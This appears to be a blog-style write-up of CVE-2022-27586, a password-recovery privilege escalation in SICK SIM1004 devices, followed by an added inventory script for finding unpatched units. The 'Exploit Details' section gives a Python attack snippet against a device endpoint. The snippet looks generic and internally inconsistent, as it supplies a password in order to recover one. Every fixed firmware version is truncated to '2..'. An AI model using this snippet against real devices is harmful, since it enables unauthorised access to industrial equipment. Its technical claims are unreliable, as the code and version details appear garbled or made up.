Security researchers have discovered a critical vulnerability, tracked as CVE-2022-27586, affecting SICK SIM1004 devices with part number 1098148 and firmware versions lower than 2... This vulnerability allows an unprivileged remote attacker to invoke the password recovery mechanism and gain access to user levels that are defined as RecoverableUserLevel, elevating their privileges on the system. As a result, the confidentiality, integrity, and availability of the system are compromised. This post discusses the details of the vulnerability, the exploit, and the recommended solution.

Exploit Details

The vulnerability is caused by a weakness in the password recovery mechanism of the SICK SIM1004 device. An attacker exploits it by invoking the password recovery method for a RecoverableUserLevel. The following code snippet demonstrates how to exploit the vulnerability:

import requests

TARGET = 'http://<target_device>/'
USERNAME = 'RecoverableUserLevel'
PASSWORD = 'password'  # Replace with actual password

# Step 1: Invoke password recovery mechanism
response = requests.post(
    TARGET + 'api/recover_password',
    json={'username': USERNAME, 'password': PASSWORD}
)

# Step 2: Check response for success
if response.status_code == 200:
    print('Password recovery successful')
    # Use new access to perform actions with increased privileges
else:
    print('Password recovery failed')

Attackers can expect repeatable success in exploiting the vulnerability if the targeted SICK SIM1004 has firmware versions lower than 2...

Original References

1. SICK Product Security Advisory: Vulnerability in SICK SIM1004
2. NIST National Vulnerability Database: CVE-2022-27586

All SICK SIM1004 (part number 1098148) users with firmware versions lower than 2.. are strongly advised to update the firmware to version 2.. or higher as soon as possible. The updated firmware can be obtained from the SICK Support Portal: https://support.sick.com
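To find the units that need this update, the following added example (not code from SICK or from the original post) triages an asset inventory for SIM1004 devices with part number 1098148 whose firmware is below the fixed release. The fixed version is passed in as a parameter because it is truncated on this page and must be taken from the SICK advisory; the inventory columns, host names and the "9.9.9" value are constructed for illustration.

```python
import csv
import io

PRODUCT = "SIM1004"
PART_NUMBER = "1098148"  # affected part number named on this page

# Constructed sample inventory (hypothetical hosts, column names and versions).
SAMPLE_INVENTORY = """host,product,part_number,firmware
line1-sim,SIM1004,1098148,1.4.0
line2-sim,SIM1004,1098148,9.9.9
line3-sim,SIM1004,1098148,
lab-sim,SIM1004,1098148,v1.10.2
cell7-cam,OtherSensor,2000001,0.9.0
"""


def parse_version(text):
    """Return a tuple of ints for dotted versions like '1.10.2', else None."""
    parts = text.strip().lstrip("vV").split(".")
    if not all(p.isdigit() for p in parts):
        return None
    nums = [int(p) for p in parts]
    while len(nums) > 1 and nums[-1] == 0:  # so that '2' and '2.0.0' compare equal
        nums.pop()
    return tuple(nums)


def triage(inventory_csv, fixed_version):
    """Return (hosts needing the update, hosts whose version must be checked by hand)."""
    fixed = parse_version(fixed_version)
    if fixed is None:
        raise ValueError("fixed_version must be a dotted numeric version")
    needs_update, unknown = [], []
    for row in csv.DictReader(io.StringIO(inventory_csv)):
        if row["product"] != PRODUCT or row["part_number"] != PART_NUMBER:
            continue  # other products and part numbers are out of scope here
        current = parse_version(row["firmware"] or "")
        if current is None:
            unknown.append(row["host"])  # missing or unreadable: verify on the device
        elif current < fixed:  # numeric comparison, so 1.4.0 sorts below 1.10.0
            needs_update.append(row["host"])
    return needs_update, unknown


if __name__ == "__main__":
    # "9.9.9" is a placeholder, NOT the real fixed release; use the advisory's value.
    outdated, unverified = triage(SAMPLE_INVENTORY, "9.9.9")
    print("update firmware:", outdated)
    print("check manually:", unverified)
```

Devices with a blank or unparseable firmware field are reported separately rather than assumed patched, so they can be checked on the unit itself.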

Conclusion

The CVE-2022-27586 vulnerability in SICK SIM1004 devices (part number 1098148) with firmware versions lower than 2.. poses a significant security risk to their users. Unprivileged remote attackers can exploit this vulnerability to gain access to higher user levels, compromising the system's confidentiality, integrity, and availability. The recommended solution is to update the affected devices' firmware to version 2.. or higher, which is available from the SICK Support Portal.

Timeline

Published on: 11/01/2022 21:15:00 UTC
Last modified on: 03/31/2023 16:11:00 UTC